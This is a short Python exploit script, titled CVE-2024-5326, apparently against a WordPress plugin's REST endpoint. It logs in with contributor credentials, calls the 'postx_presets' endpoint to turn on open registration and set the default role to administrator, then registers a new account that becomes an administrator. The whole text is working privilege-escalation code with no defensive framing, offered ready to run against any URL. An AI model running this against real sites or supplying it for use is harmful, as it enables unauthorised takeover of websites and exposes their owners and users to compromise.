CVE-2024-5326.py

import requests
import re
import json

url = input('url: ')
username = input('User Contributor: ')
password = input('Password Contributor: ')

username_register = input('Register username: ')
email_register = input('Register email: ')

session = requests.Session()
session.cookies['wordpress_test_cookie']='WP%20Cookie%20check'

login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1',
    'redirect_to': url+'/wp-admin/'
}
login_response = session.post(url+'/wp-login.php', data=login_data)
print('Login User Contributor success!')
nonce = re.search('wpApiSettings = {.*,"nonce":(.*),.*};',login_response.text)
session.headers['X-WP-Nonce']= nonce.group(1).replace('"','')
post_data = {'type': 'set', 'key': '','data':''}

post_data['key'] = 'users_can_register'
post_data['data'] = 1
enable_register = session.post(url+'/wp-json/ultp/v1/postx_presets/', data=post_data)
print('Enable users_can_register: '+str(json.loads(enable_register.text)['success']))

post_data['key'] = 'default_role'
post_data['data'] = 'administrator'
set_role = session.post(url+'/wp-json/ultp/v1/postx_presets/', data=post_data)
print('Set default_role is administrator: '+str(json.loads(enable_register.text)['success']))

register_data = {'user_login':username_register,'user_email':email_register,'redirect_to':'','wp-submit':'Register'}
register_response = requests.post(url+'/wp-login.php?action=register',data=register_data)
if '/wp-login.php?checkemail=registered' in register_response.url:
    print("Register success !")